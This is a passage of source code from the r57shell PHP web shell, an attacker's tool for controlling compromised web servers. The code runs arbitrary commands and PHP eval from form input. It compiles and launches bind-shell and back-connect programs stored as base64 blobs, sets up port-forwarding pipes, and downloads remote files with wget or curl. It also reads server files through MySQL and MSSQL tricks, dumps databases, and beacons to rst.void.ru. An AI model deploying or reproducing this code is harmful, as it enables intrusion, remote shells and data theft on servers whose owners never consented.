+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC 
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs 
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz 
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#333333><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; 
+echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' 
-name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." 
&"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." 
&"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=122 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." 
|| $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - 
".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! 
Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) 